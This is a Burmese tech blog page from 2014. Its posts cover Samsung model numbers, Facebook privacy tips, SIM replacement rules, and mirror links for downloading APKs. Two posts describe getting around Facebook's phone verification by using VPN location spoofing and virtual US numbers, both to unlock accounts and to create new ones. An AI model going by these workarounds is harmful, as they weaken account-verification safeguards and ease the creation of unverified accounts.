About

လာရောက်လည်ပတ်သူများကိုလေးစားလျက်

လာရောက်လည်ပတ်သူများကိုယ်စိတ်နှလုံးသာယာချမ်းမြေ့ကြပါစေဗျာ

လာရောက်လည်ပတ်သူများကိုလေးစားလျက်

လာရောက်လည်ပတ်သူများကိုယ်စိတ်နှလုံးသာယာချမ်းမြေ့ကြပါစေဗျာ

လာရောက်လည်ပတ်သူများကိုလေးစားလျက်

လာရောက်လည်ပတ်သူများကိုယ်စိတ်နှလုံးသာယာချမ်းမြေ့ကြပါစေဗျာ

လာရောက်လည်ပတ်သူများကိုလေးစားလျက်

လာရောက်လည်ပတ်သူများကိုယ်စိတ်နှလုံးသာယာချမ်းမြေ့ကြပါစေဗျာ

လာရောက်လည်ပတ်သူများကိုလေးစားလျက်

လာရောက်လည်ပတ်သူများကိုယ်စိတ်နှလုံးသာယာချမ်းမြေ့ကြပါစေဗျာ

Wednesday, January 29, 2014

Facebook အကောင့်လော့ကျနေသလား ဒီလိုပြန်ယူလိုက်ပါ

Unknown | 9:24 PM | Best Blogger Tips

မြန်မာနိုင်ငံသား Facebook User တွေအနေနဲ့
ကိုယ့်ရဲ့အကောင့်လေး လော့ကျပြီး ဖုန်းနံပါတ်
အတောင်းခံရပြီဆိုရင် အဲဒီအကောင့်ကို ဆုံးရှုံးသွားပြီလို့
သတ်မှတ်ခဲ့ရပါတယ်

ဘာကြောင့်လဲဆိုတော့ Facebook ပို့တဲ့ Verification Code ဟာ
မြန်မာနိုင်ငံကဖုန်းတွေဆီကို မရောက်နိုင်လို့ပါ
အခုတော့ ကလိမ်ကကျစ်နည်းလမ်းလေးတွေသုံးပြီး
အဲဒီအခက်အခဲကို ဖြေရှင်းနိုင်ပါပြီ
ဒီနည်းလမ်းကို အသုံးပြုဖို့အတွက်

(၁) Model အရမ်းကြီးမနိမ့်တဲ့ Android ဖုန်းတစ်လုံး
(၂) Hotspot Shield VPN APK
(၃) TextPlus APK နဲ့
(၄) Yuilop APK တို့ လိုအပ်ပါတယ်

Hotspot Shield APK ကို ဒီမှာ ဒေါင်းပါ

TextPlus APK ကို ဒီမှာ ဒေါင်းပါ

Yuilop APK ကို ဒီမှာ ဒေါင်းပါ

APK သုံးခုလုံးကို တစ်ခါတည်းဒေါင်းချင်ရင်တော့ ဒီမှာ ဒေါင်းပါ ( 30 MB ကျော်ရှိပါတယ်)

( Android ဖုန်းတစ်လုံးကို ဒီမှာ ဒေါင်းပါလို့ မပြောနိုင်တာ စိတ်မရှိပါနဲ့ .. :P )

ဒေါင်းလို့ ရလာတဲ့ APK တွေကို ဖုန်းထဲမှာ Install လုပ်လိုက်ပါ

တစ်ချို့ဖုန်းတွေမှာ Yuilop APK က မ Run ပဲ ပြန်ပိတ်သွားတဲ့ ပြဿနာရှိပါတယ်
ကျွန်တော်ကတော့ အဲဒီဖြစ်ပြီဆိုရင် Yuilop ကို ဖုန်းထဲကနေ Uninstall လုပ်ပစ်လိုက်ပါတယ်
ပြီးရင် Root Explorer လို Application ကိုသုံးပြီး root >> system >> app ဆိုတဲ့ဖိုဒါထဲကို
အဆင့်ဆင့်ဖွင့်ဝင်သွားပြီး Yuilop.apk ကို ကူးထည့်လိုက်ပါတယ်
ပြီးရင် အဲဒီကူးထည့်လိုက်တဲ့ Yuilop.apk ပေါ်မှာ ခပ်ကြာကြာဖိထားပြီး ပေါ်လာတဲ့ထဲက Permission ကိုရွေးပြီး
rw.r.r ဖြစ်အောင် Permission ပြောင်းပေးလိုက်ပါတယ်
ပြီးရင် ဖုန်းကို Restart ချလိုက်တယ်
ဖုန်းပြန်ပွင့်လာတဲ့အခါမှာ Yuilop ကို အဆင်ပြေပြေနဲ့ Run နိုင်တာ တွေ့ရပါတယ်
( ဒီနည်းက Root ဖောက်ထားတဲ့ဖုန်းတွေမှာပဲ သုံးလို့ရမှာဖြစ်ပါတယ် )
ကဲ .. ထားပါတော့
ကျန်တာတွေ ဘယ်လိုဆက်လုပ်မှာလဲ သိချင်နေမှာပေါ့
လုပ်ဆောင်ရမယ့် နည်းလမ်းအဆင့်ဆင့်ကို စာအုပ်လေးရေးပြီး တင်ပေးထားပါတယ်

အဲဒီစာအုပ်ကိုတော့ ဒီမှာ ဒေါင်းယူနိုင်ပါတယ်

ဒီနည်းလမ်းမှာ လတ်တလောကြုံတွေ့နေရတဲ့ Yuilop က Confirm Code ဟာ TextPlus ထဲရောက်မလာတဲ့ပြဿနာကို
ဖြေရှင်းထားပါတယ်
အဲဒီပြဿနာကို ဖြေရှင်းဖို့ Hotspot Shield ဆိုတဲ့ Application တစ်ခုကို သုံးထားပါတယ်
ဖုန်းရဲ့ VPN ကို Fake လုပ်ပေးတဲ့ APK ပါ
ဒီ APK လေးကို Run မထားရင် Yuilop က Confirm Code သာမက Facebook က Verification Code လည်း
ဖုန်းထဲကို ရောက်လာမှာမဟုတ်ပါဘူး
တစ်ခုသတိပေးချင်တာက ဒီ Hotspot Shield VPN ဆိုတဲ့ Application ကို Run ထားတဲ့ဖုန်းထဲမှာ ကိုယ့်ရဲ့လက်ရှိ
Facebook အကောင့်ကို မသုံးမိပါစေနဲ့ အဲဒီအကောင့်ကို US ကနေ တစ်ယောက်ယောက် ခိုးသုံးနေတယ်လို့
Facebook က ယူဆပြီး လော့ချပစ်တာတွေ Security Test လုပ်တာတွေ ခံရတတ်ပါတယ်
နောက်ပြီးအဲဒီဖုန်းထဲမှာရှိနေတဲ့ Gmail ထဲကိုလည်း " မင်းရဲ့အကောင့်ကို US က တစ်ယောက်ယောက် ခိုးသုံးနေပါတယ် "
ဆိုတဲ့ Message တွေကို Google Team က မကြာခဏပို့နေမှာဖြစ်ပါတယ် ( ဖြစ်ဖူးတာတွေကို ကြိုပြောပြထားတာပါ )
ဒီနည်းလမ်းဟာ ဖုန်းနံပါတ်အတောင်းခံနေရတဲ့ Locked Account တွေအတွက် ဖြေရှင်းပေးမယ့်နည်းသာဖြစ်ပြီး
ဓာတ်ပုံရွေးခိုင်းတာတွေ မွေးသက္ကရာဇ်ထည့်ခိုင်းတာတွေမျိုး Security Tips မိနေတဲ့ အကောင့်တွေအတွက်မဟုတ်ပါဘူး
နောင်အလျဉ်းသင့်တဲ့အခါမှာ ဗွီဒီယိုဖိုင်အဖြစ်နဲ့ ထပ်တင်ပေးပါဦးမယ်

ကဲ .. အားလုံးအဆင်ပြေကြပါစေဗျာ

Samsung ၏နောက်ထွက်မည့် စမတ်ဖုန်းမော်ဒယ်များနံပါတ်များအတည်ပြု

Unknown | 9:21 PM | Best Blogger Tips

Samsung ၏နောက်ထွက်မည့် စမတ်ဖုန်းအတွက် မော်ဒယ်နံပါတ်များအတည်ပြုလိုက်ပြီဖြစ်ပြီး SM-G900 ဆိုသောမော်ဒယ်နံပါတ်များဖြင့်သုံးစွဲသွားမည်ဖြစ်သည်။
ထပ်မံထွက်ရှိမည့် Samsung စမတ်ဖုန်းမှာ S5 ဖြစ်နိုင်ပြီး အဆိုပါမော်ဒယ်နံပါတ်များ၏ နောက်ဆုံးစာလုံးများဖြင့် စမတ်ဖုန်းများကို ခွဲခြားသွားမည်ဖြစ်သည်။
AT&T နှင့် Verizon မိုဘိုင်းအော်ပရေတာများအတွက် SM-G900A နှင့် SM-G900V တို့ဖြစ်ပြီး ဥရောပနှင့် နိုင်ငံတကာ အတွက် SM-G900F နှင့် SM-G900S တို့ဖြစ်လာမည်ဖြစ်သည်။
Galaxy S5 သို့မဟုတ် မော်ဒယ်နံပါတ် SM-900 ၏ အခြားသောမော်ဒယ်များမှာ
- SM-G9006V_CHN_CHN (China)
- SM-G9008V_CHN_ZM (China)
- SM-G9009D_CHN_CTC (China)
- SM-G900A_NA_ATT (AT&T)
- SM-G900D_JPN_DCM (Japan)
- SM-G900F_EUR_XX (Open Europe)
- SM-G900H_EUR_XX (Open Europe)
- SM-G900I_SEA_XSA (Asia)
- SM-G900J_JPN_KDI (Japan)
- SM-G900K_KOR_KTC (Korea)
- SM-G900M_LA_VF (Vodafone)
- SM-G900P_NA_SPR (Sprint)
- SM-G900R4_NA_USC (US Cellular)
- SM-G900S_KOR_SKC (Korea)
- SM-G900T_NA_TMB (T-Mobile)
- SM-G900V_NA_VZW (Verizon)
- SM-G900W8_NA_BMC (BMC)
တို့ဖြစ်သည်။

Ref#TechSpace Journal

PDF Viber Chat Pro v1.3 APK Download (3Mb) !!!

Unknown | 9:14 PM | Best Blogger Tips

Viber To PDF to PDF a viber chat လေးလာပါပြီ။ Viber ကနေ Text,Photos,Video တွေကအစပို့လို့
ရပါပြီ။ROOTED and NON-ROOTED နှစ်မျိုးလုံးသုံးလို့ရပါတယ်။Rooted သမားတွေအတွက် “Viber To PDF” ကိုနှိပ်ပြီးအသုံးပြုရုံပါပဲ။NON-ROOTED သမားတွေအတွက် Viber -> Menu -> More Options -> Settings -> Email chat History and choose PDF Viber chat and select conversation to pdf
ကိုရွေးပေးလိုက်ပါ။ဒါဆိုရင်အသုံးပြုလို့ရပါပြီ။

Description:

You can use Viber To PDF to PDF a viber chat, the PDF file can be shared between friends and can be used for backup purpose.The whole conversation will be written to PDF file including Text, Photo, Location.
The Video thumbnails will be there in PDF.
NOTE: Application will work in two modes ROOTED and NON-ROOTED. If your phone is rooted then you can select a conversation from “Viber To PDF” application itself, in case of NON-ROOTED phone you can open Viber -> Menu -> More Options -> Settings -> Email chat History and choose PDF Viber chat and select conversation to pdf.
In NON-ROOTED phones Photos,Video thumbnail and location info will partially available

http://adfoc.us/14251337590243
(or)

http://adfoc.us/14251337595523
(or)

http://adfoc.us/14251337595537

ဖေ့စ်ဘုတ် လျှို့ဝှက်ချက် (၁၀၀)

Unknown | 7:51 PM | Best Blogger Tips

ဖေ့စ်ဘုတ် လျှို့ဝှက်ချက် (၁၀၀) ထဲက အချို့ကိုဖေါ်ပြပေးလိုက်ပါ..

# 005 # တစ်စုံတစ်ယောက်ကို Block လုပ်ချင်ရင် Settingထဲက Privacy Setting မှာ Block Listကိုတွေ့ ရမှာပါ။ အဲဒီမှာ ကိုယ် Blockလုပ်ချင်သူရဲ့ Emial ရိုက်ထည့်ပြီး Remove လုပ်လိုက်ရုံပါပဲ။ နောက်တခါ Friend Requestထပ်ပို့ မှပဲ ကျွန်တော်တို့ သူငယ်ချင်း ပြန် ဖြစ်နိုင်ပါတော့မယ်။

# 006 # Comment တွေဖျက်ဖိ့ ဆိုရင် Remove Button နဲ့  ခပ်လွယ်လွယ် ဖယ်ရှားလိုက်ရုံနဲ့ ရပါတယ်။

# 007 # ကိုယ့်ပုံ သူများမမြင်စေချင်ရင် ကိုယ့် Profile Photo မှာသူများ Tag ချိတ်ပေးတဲ့ ပုံတွေများနေမယ်ဆိုရင် RemoveTagလုပ်ဖို့  လိုပါတယ်။ ကိုယ့်ရဲ့ Tag လုပ် ထားတဲ့ Photo ကိုဖွင့်လိုက်ပါ။ အဲဒီဓါတ်ပုံ (Photo) အောက်မှာ Tag ချိတ်ထားတဲ့ ကိုယ့်နာမည်ရှိပါလိမ့်မယ်။ အဲဒီ နာမည် ဘေးမှာ Photo နဲ့  Remove Tag ဆိုတာတွေ့ ရပါမယ်။ Remove Tagလုပ်ရုံပါပဲ။ ဒါဆိုရင်Tag လုပ်ထားတဲ့ ပုံတွေ မရှိတော့ပါဘူး။

# 008 # ကိုယ့်ရဲ့ ပုံတွေ ဗွီဒီယိုတွေရဲ့ Privacy ကိုပိုပြီးစိတ်ချရအောင် Accountထဲက Privacy Settings က Profile Information ကိုသွားပါ။ အဲဒီမှာ Bio, Birthday, Religions, Photo,Post, Allow Friends To Post My Wall, Comments စသဖြင့် ကိုယ့် Friendsတွေပဲတွေ့ စေချင်တာလား။တခြားလူတွေပါမြင်စေချင်သလားဆိုတာရွေးပါ။ Privacy Level မှာ Only Me, Block Specific People စသဖြင့်ကြိုက်ရာတစ်ခုခုလုပ်ပါ။ Preview My Profile ကိုရွေးပြီး Check စစ်ဆေးကြည့်နိုင်ပါတယ်။

# 009 # ကိုယ့် နာမည်ကို Facebook ရဲ့ Search မှာ မတွေ့ စေချင်ရင် Settingsထဲက Privacy Setting ထဲကSearch ကိုရှာပါ။ အဲဒီမှာ Only Friends ကိုရွေးချယ်ပါ။ ခုဆိုရင် သင့် Friendsတွေကပဲ ကိုယ့် ကိုရှာတွေ့ မှာပါ။

# 010#Facebook Layout ပြောင်းချင်ရင် Page Rage Super Profile က Facebook ရဲ့ Application ဖြစ်ပြီး ကိုယ့်Facebook Profile ရဲ့ Skin ကိုပြောင်းလဲပေးပါလိမ့်မယ်။ Add-ons တွေ အများကြီးရှိပါတယ်။ YontooLagesအမည်ရှိ Add on software တစ်ခုကိုInstallလုပ်ရမှာ ဖြစ်ပြီးဒါက Facebook ရဲ့ Layout ကိုပြောင်းပေးမှာပါ။

# 011 # Friends List ကိုဖျောက်ချင်ရင် Privacy Settings ထဲက Friends ဆိုတဲ့ Options မှာ “Every One” လား၊ “Friends ofFriends” လား၊ “Only Friends” လား၊ “Customize” လားတစ်ခုခု စိတ်ကြိုက်ရွေးလိုက်ရုံပါပဲ။

# 012 # ဂိမ်း မကစားချင်တော့ဘူးဆိုရင် Facebookရဲ့ Farmville ဟိုး အရင်တုန်းကဆော့ခဲ့ပေမဲ့ အခုတော့ မဆော့ဖြစ်တော့ပေမဲ့ လက်ဆောင် များစွာ က နေ့တိုင်း ရောက်နေဦးမှာပါ။ မျက်စိနောက်စရာ ဒီပြသနာအတွက် ApplicationSettingကို ၀င်ပါ။ အဲဒီထဲက Game ကို (x) နဲ့  Remove လုပ်လိုက်ပါ။

# 013 # hashtag Facebook မှာ Twitter လိုမျိုး hashtag ကို ထည့်လိုက်ပြီ နည်းနည်းကြာပါပြီ။ ဒါပေမဲ့ မသိသေးတဲ့ လူတွေ အဆင်ပြေအောင်လို့ ဒီလိုလေး လုပ်ကြည့်ပါ။ အကျိုးထူးပါတယ်။ နောက်ပိုင်း status တွေရေးရင် ကိုယ့် status ရဲ့ အဓိကသော့ချက်စကားလုံးကို # ခံပြီးရေးလို့ရပါပြီ။ ဥပမာ ဒေါ်အောင်ဆန်းစုကြည် အကြောင်းရေးထားတာမျိုးဆိုရင် ‪#‎DawAungSan‬ SuKyi ဆိုပြီး status မှာထည့်ရေးလိုက်ပါ။ ဒါဆိုဘယ်လိုအကျိုးကျေးဇူးဖြစ်လာမလဲဆိုရင်တော့www.facebook.com/hashtag/DawAungSanSuKyi ဆိုပြီးတစ်ယောက်ယောက်ကရှာလိုက်ရင် # မှာ ထည့်ပြီးရေးခဲ့တဲ့ status တွေအားလုံးကိုသူ့အနေနဲ့ အလွယ်တကူ ရှာဖွေတွေ့ရှိနိုင်သွားမှာ ဖြစ်ပါတယ်။

How to Easy Create a New Facebook Account !!!

Unknown | 7:48 PM | Best Blogger Tips

Facebook အကောင့်လုပ်တာအခက်အခဲ
ဖြစ်နေတဲ့သူငယ်ချင်းတွေအတွက်ပါ Facebook အကောင့်တစ်ခုကိုဖုန်းနံပါတ်တွေ/ကုဒ်တွေမတောင်းပဲ
အလွယ်ဆုံးရတဲ့နည်းလေးကို Movie အဖြစ်နဲ့ရော / ဓါတ်ပုံလေးတွေနဲ့ပါဒေါင်းလော့စ်ဖိုင်ထဲမှာရှင်းပြထား
ပါတယ်။ကြားရတဲ့သတင်းတွေကတော့ Facebook အကောင့်တစ်ခုလုပ်ဘယ်လောက်ကုန်ကျပါတယ်။
ဘာညာပေါ့။ကိုယ်ကိုယ်တိုင်မလုပ်တတ်တော့လည်းပေးရတာပေါ့။ဒါကြောင့်ကိုယ်တိုင်လေးလုပ်တတ်သွား
အောင် Movie လေးကိုကြည့်ပါပြီးရင် ဓါတ်ပုံလေးတွေနဲ့ Slideshow လုပ်ပြထားပါတယ်။ဒီမှာပုံတွေနဲ့
မရှင်းပြတော့ပါဘူး။ကြိုက်တယ်ဆိုရင်တော့ အောက်မှာသွားဒေါင်းလိုက်ပါ။

Download>>One2up
Download>>Solidfiles
Download>>Zippyshare

ဖုန်းဆင်းကတ်ပျောက်၍ ပြန်လျှောက်သူ စာချုပ်မရှိက နောက်ဆုံးခေါ်ယူခဲ့ သည့်ဖုန်း 3-Calls သက်သေပြရမည်

Unknown | 6:53 PM | Best Blogger Tips

ဖုန်းဆင်းကတ်ပျောက်ဆုံးသူများ စာရွက်စာတမ်း မရှိပါက နောက်ဆုံးခေါ် ယူထားသည့် ဖုန်းခေါ်ဆိုမှုသုံးကြိမ်ကို ပြနိုင်မှသာ ဆင်းကတ်ပြန်လည် ထုတ် ပေးတော့မည် ဟု မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှသိရသည်။
”ဘာစာချုပ်မှမပြဘဲ ရဲစခန်း ထောက်ခံချက်တွေနဲ့ လုပ်ပေးတဲ့စနစ် ကိုဖျက်သိမ်းလိုက်တာပါ။ ဒီအချက်တွေ မပြနိုင်ရင်တော့ ဆင်းကတ် ထုတ်မပေး တော့ပါဘူး” ဟု မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှဒုတိယမိုဘိုင်းအင်ဂျင်နီယာ ချုပ် ဦးကိုကိုအောင်က ပြောသည်။
စာရွက်စာတမ်းအချက်အလက် အပြည့်အစုံပါရှိသည့် ဖုန်းများကိုမူ ယခင်အတိုင်း စစ်ဆေးမှုများ ပြုလုပ်၍ ဆင်းကတ်ပြန်လည်ထုတ်ပေးသွား မည် ဖြစ်ပြီး နောက်ဆုံးခေါ် ဆိုထားသည့် ဖုန်3း Calls ပြစရာမလိုကြောင်း ၄င်းက ဆက်လက်ပြောသည်။
”နောက်ဆုံးဖုန်း 3 Calls မမှတ်မိ ဘူးလို့ပြောကြမှာပါ။ ဒါပေမဲ့ ဖုန်း ပျောက်သူတွေအနေနဲ့ ကိုယ့်မိသားစု၊ သူငယ်ချင်းတွေ ဆက်မိကြမှာပါ။ ကျွန်တော်တို့အနေ နဲ့ ကောက်ရိုးမျှင်တစ် မျှင်ရှာဖွေသလိုမျိုး အစရှိရုံနဲ့ ကတ်ပြန် လည်လုပ်ပေးလို့ရပါတယ်”ဟု ၄င်းက ဆက်ပြောသည်။
ယင်းသို့ ပြုလုပ်ရခြင်းမှာ ရဲစခန်း ထောက်ခံချက်ဖြင့် လာရောက်လျှောက် ထားသည့်ဖုန်းများကို မြန်မာ့ဆက်သွယ် ရေးလုပ်ငန်းမှ တရားရုံးများတွင် သက် သေထွက် ဆိုပေးနေရသည့်အတွက် ပိုမို လွယ်ကူသောစနစ် ကိုပြောင်းလဲခြင်း ဖြစ်သည်ဟု ၄င်းကပြောသည်။
လက်ရှိတွင် မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှ ဖုန်းဆင်းကတ်ပျောက်ဆုံးမှု ကို စာချုပ်မရှိပါက နောက်ဆုံးခေါ်ဆို သည့်ဖုန်း 3 Calls ပြနိုင်မှ လျှောက် ထားခွင့်ပြုမည်ဟု အထက်ပါပုဂ္ဂိုလ်မှ ပြောဆိုထားသော်လည်း ဆင်းကတ်ပြန် လည်ထုတ်ပေးသည့် ဆက်သွယ်ရေးရုံး များ၌မူ စာချုပ်ပါရှိပါက လည်း နောက် ဆုံးခေါ်ဆိုသည့်ဖုန်း 3 Calls ကို သက် သေပြခိုင်း၍ ဖုန်းဆင်းကတ် ပျောက်သူ များ အခက်တွေ့နေကြောင်း သိရသည်။
”ကိုယ့်ဖုန်းပျောက်လို့ ကိုယ်တိုင် လာပြီးစာချုပ်နဲ့လာတာတောင် မရဘူး ပြောနေတယ်။ ရုံးချုပ်ရွှေဂုံတိုင် ရုံးကို သွားပါ။ အကူအညီပေးပါလိမ့်မယ်လို့ လမ်းညွှန်နေပါတယ်” ဟု ပန်းဆိုးတန်း ဆက်သွယ်ရေးရုံး၌ ဖုန်းဆင်းကတ် လျှောက်ထားသူတစ်ဦးကပြောသည်။
မြန်မာ့ဆက်သွယ်ရေးလုပ်ငန်း သည် မိုဘိုင်းဖုန်းဆင်းကတ်များ ပျောက် ဆုံးမှုပြန်လည် လျှောက်ထား ခြင်းကို ယခင်ကျပ်ငါးသိန်းဖုန်း များ ပေါ်ပေါက်စဉ်ကာလတွင် ကျပ်ငါး သောင်းကောက်ခံခဲ့သော်လည်း ကျပ် နှစ်သိန်းတန်ဖုန်းများ ပေါ်ပေါက်လာပြီး နောက် ကျပ်ငါးသောင်းမှ ကျပ်နှစ် သောင်းသို့ လျှော့ချပေးခဲ့သည်။ လက် ရှိကျပ် တစ်ထောင့်ငါးရာဖုန်းများ ရှိလာ သည့်အချိန်အထိ ကျပ်နှစ်သောင်းနှုန်း အတိုင်း ဆက်လက်ကောက်ခံနေကြောင်း သိရသည်။ မြန်မာ့ဆက်သွယ်ရေး မှ ဖုန်း ဆင်းကတ်ပျောက်ဆုံးမှုကြောင့် ပြန်လည်လျှောက် ထားပါက နောက်ဆုံးဖုန်း 3 Calls ပြခိုင်းမှုကို ယခုလ ၂၇ ရက်နေ့မှ စတင်ခဲ့ကြောင်း အဆိုပါဌာနမှ သိရ သည်။
အောင်ဇော်
Credit to#Popular Myanmar News Journal
ဖုန်းဆင်းကတ်ပျောက်၍ ပြန်လျှောက်သူ စာချုပ်မရှိက နောက်ဆုံးခေါ်ယူခဲ့ သည့်ဖုန်း 3-Calls သက်သေပြရမည်

ဖုန်းဆင်းကတ်ပျောက်ဆုံးသူများ စာရွက်စာတမ်း မရှိပါက နောက်ဆုံးခေါ် ယူထားသည့် ဖုန်းခေါ်ဆိုမှုသုံးကြိမ်ကို ပြနိုင်မှသာ ဆင်းကတ်ပြန်လည် ထုတ် ပေးတော့မည် ဟု မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှသိရသည်။

”ဘာစာချုပ်မှမပြဘဲ ရဲစခန်း ထောက်ခံချက်တွေနဲ့ လုပ်ပေးတဲ့စနစ် ကိုဖျက်သိမ်းလိုက်တာပါ။ ဒီအချက်တွေ မပြနိုင်ရင်တော့ ဆင်းကတ် ထုတ်မပေး တော့ပါဘူး” ဟု မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှဒုတိယမိုဘိုင်းအင်ဂျင်နီယာ ချုပ် ဦးကိုကိုအောင်က ပြောသည်။

စာရွက်စာတမ်းအချက်အလက် အပြည့်အစုံပါရှိသည့် ဖုန်းများကိုမူ ယခင်အတိုင်း စစ်ဆေးမှုများ ပြုလုပ်၍ ဆင်းကတ်ပြန်လည်ထုတ်ပေးသွား မည် ဖြစ်ပြီး နောက်ဆုံးခေါ် ဆိုထားသည့် ဖုန်3း Calls  ပြစရာမလိုကြောင်း ၄င်းက ဆက်လက်ပြောသည်။

”နောက်ဆုံးဖုန်း 3 Calls  မမှတ်မိ ဘူးလို့ပြောကြမှာပါ။ ဒါပေမဲ့ ဖုန်း ပျောက်သူတွေအနေနဲ့ ကိုယ့်မိသားစု၊ သူငယ်ချင်းတွေ ဆက်မိကြမှာပါ။ ကျွန်တော်တို့အနေ နဲ့ ကောက်ရိုးမျှင်တစ် မျှင်ရှာဖွေသလိုမျိုး အစရှိရုံနဲ့ ကတ်ပြန် လည်လုပ်ပေးလို့ရပါတယ်”ဟု ၄င်းက ဆက်ပြောသည်။

ယင်းသို့ ပြုလုပ်ရခြင်းမှာ ရဲစခန်း ထောက်ခံချက်ဖြင့် လာရောက်လျှောက် ထားသည့်ဖုန်းများကို မြန်မာ့ဆက်သွယ် ရေးလုပ်ငန်းမှ တရားရုံးများတွင် သက် သေထွက် ဆိုပေးနေရသည့်အတွက် ပိုမို လွယ်ကူသောစနစ် ကိုပြောင်းလဲခြင်း ဖြစ်သည်ဟု ၄င်းကပြောသည်။

လက်ရှိတွင် မြန်မာ့ဆက်သွယ်ရေး လုပ်ငန်းမှ ဖုန်းဆင်းကတ်ပျောက်ဆုံးမှု ကို စာချုပ်မရှိပါက နောက်ဆုံးခေါ်ဆို သည့်ဖုန်း 3 Calls  ပြနိုင်မှ လျှောက် ထားခွင့်ပြုမည်ဟု အထက်ပါပုဂ္ဂိုလ်မှ ပြောဆိုထားသော်လည်း ဆင်းကတ်ပြန် လည်ထုတ်ပေးသည့် ဆက်သွယ်ရေးရုံး များ၌မူ စာချုပ်ပါရှိပါက လည်း နောက် ဆုံးခေါ်ဆိုသည့်ဖုန်း 3 Calls ကို သက် သေပြခိုင်း၍ ဖုန်းဆင်းကတ် ပျောက်သူ များ အခက်တွေ့နေကြောင်း သိရသည်။

”ကိုယ့်ဖုန်းပျောက်လို့ ကိုယ်တိုင် လာပြီးစာချုပ်နဲ့လာတာတောင် မရဘူး ပြောနေတယ်။ ရုံးချုပ်ရွှေဂုံတိုင် ရုံးကို သွားပါ။ အကူအညီပေးပါလိမ့်မယ်လို့ လမ်းညွှန်နေပါတယ်” ဟု ပန်းဆိုးတန်း ဆက်သွယ်ရေးရုံး၌ ဖုန်းဆင်းကတ် လျှောက်ထားသူတစ်ဦးကပြောသည်။

မြန်မာ့ဆက်သွယ်ရေးလုပ်ငန်း သည် မိုဘိုင်းဖုန်းဆင်းကတ်များ ပျောက် ဆုံးမှုပြန်လည် လျှောက်ထား ခြင်းကို ယခင်ကျပ်ငါးသိန်းဖုန်း များ ပေါ်ပေါက်စဉ်ကာလတွင် ကျပ်ငါး သောင်းကောက်ခံခဲ့သော်လည်း ကျပ် နှစ်သိန်းတန်ဖုန်းများ ပေါ်ပေါက်လာပြီး နောက် ကျပ်ငါးသောင်းမှ ကျပ်နှစ် သောင်းသို့ လျှော့ချပေးခဲ့သည်။ လက် ရှိကျပ် တစ်ထောင့်ငါးရာဖုန်းများ ရှိလာ သည့်အချိန်အထိ ကျပ်နှစ်သောင်းနှုန်း အတိုင်း ဆက်လက်ကောက်ခံနေကြောင်း သိရသည်။ မြန်မာ့ဆက်သွယ်ရေး မှ ဖုန်း ဆင်းကတ်ပျောက်ဆုံးမှုကြောင့် ပြန်လည်လျှောက် ထားပါက နောက်ဆုံးဖုန်း 3 Calls  ပြခိုင်းမှုကို ယခုလ ၂၇ ရက်နေ့မှ စတင်ခဲ့ကြောင်း အဆိုပါဌာနမှ သိရ သည်။

အောင်ဇော်

Facebook အကောင့်လော့ကျတာကို ပြန်ယူရန် နောက်တစ်နည်း

Unknown | 5:09 PM | Best Blogger Tips

Facebook အကောင့်တွေဟာ
အသုံးပြုနေရင်း အကြောင်းအမျိုးမျိုးကြောင့်
Lock ကျတတ်တာကို Facebook အသုံးပြုနေသူ
သူငယ်ချင်းအားလုံးနီးပါး သိကြမှာပါ။

လော့ကျတဲ့နေရာမှာ ဖုန်းနံပါတ်အတောင်းခံတဲ့နည်းနဲ့
လော့ကျသလို ဓာတ်ပုံရွေးခိုင်းတဲ့နည်းနဲ့လည်း
လော့ကျတတ်ပါတယ်။

ဖုန်းနံပါတ်အတောင်းခံရတဲ့ အကောင့်တွေကို
ပြန်ယူနိုင်တဲ့နည်းလမ်းကို  မှာ တင်ပေးခဲ့ဖူးပါတယ်

အဲဒီပို့စ်ထဲမှာ အသုံးပြုခဲ့တဲ့ Yuilop ဖုန်းကို အသုံးပြုတဲ့နေရာမှာ
တစ်ခါတစ်ခါ ကုဒ်မရောက်တာတွေ ကြုံတွေ့နေရတတ်ပါတယ်
တယ်တော့ ကုဒ်က အမြဲတမ်းမရောက်တာမဟုတ်ပါဘူး .. ဘယ်လိုနည်းနဲ့မှ ကုဒ်ရောက်မလာဘူးဆိုရင်
နောက်ထပ် နံပါတ်အသစ်တစ်ခု ထပ်ပြီး ဖန်တီးပြီး ကြိုးစားကြည့်ရင် အဆင်ပြေသွားတတ်ပါတယ် ..
အခုတင်ပေးမယ့်နည်းလေးကတော့ Yuilop အကောင့်ဖန်တီးသလို အလုပ်သိပ်မများတဲ့အပြင်
Facebook Verification ကုဒ်ရောက်တာလည်း တော်တော်သေချာတဲ့ နည်းတစ်ခုဖြစ်ပါတယ်
အသုံးပြုတဲ့ ဖုန်းနံပါတ်ကတော့ Pinger ဖုန်းနံပါတ်ဖြစ်ပါတယ်
Pinger ကို အသုံးပြုဖို့ကလည်း Yuilop အသုံးပြုတုန်းကလို VPN ကျော်တဲ့ ဆော့ဝဲတစ်ခုခု လိုတာပါပဲ ..
အသစ်အဆန်းလည်းဖြစ် အသုံးပြုရတာလည်း လွယ်ကူ အင်တာနက်လိုင်းအားလည်း သိပ်မလိုတဲ့
VPN ကျော်တဲ့နေရာမှာ အသုံးပြုမယ့် ဆော့ဝဲကတော့ Your Freedom ဆော့ဝဲပဲဖြစ်ပါတယ်
ဒါကြောင့် အခုနည်းလေးအတွက်လိုအပ်တဲ့

Your Freedom apk ကို ဒီနေရာ မှာ ဒေါင်းယူပါ

Pinger apk မရှိသေးရင်လည်း ဒီနေရာ မှာ တင်ပေးထားပါတယ်

အားလုံးကို ဖုန်းထဲမှာ Install လုပ်ပြီးပြီဆိုရင်တော့ Your Freedom ကို Run လိုက်ပါ
အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်

Start Connection ကိုနှိပ်ပေးလိုက်ပါ .. အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်

ပြထားတဲ့နေရာမှာ အမှန်ခြစ်လေးတပ်ပေးပြီး OK ကို နှိပ်ပေးလိုက်ပါ
ခဏလောက်အကြာမှာ ဖုန်းရဲ့အပေါ်ပိုင်း Noti Bar မှာ သော့ပုံလေးပေါ်လာပါမယ်
အဲဒါဆိုရင် ဖုန်းရဲ့ Home Key ကို နှိပ်ပြီး ထွက်လိုက်ပါ
( ဒီနေရာမှာ Your Freedom နဲ့အဆင်မပြေရင်လည်း တခြား VPN ကျော်တဲ့ဆော့ဝဲတစ်ခုခုသုံးထားရင် အဆင်ပြေပါတယ် )
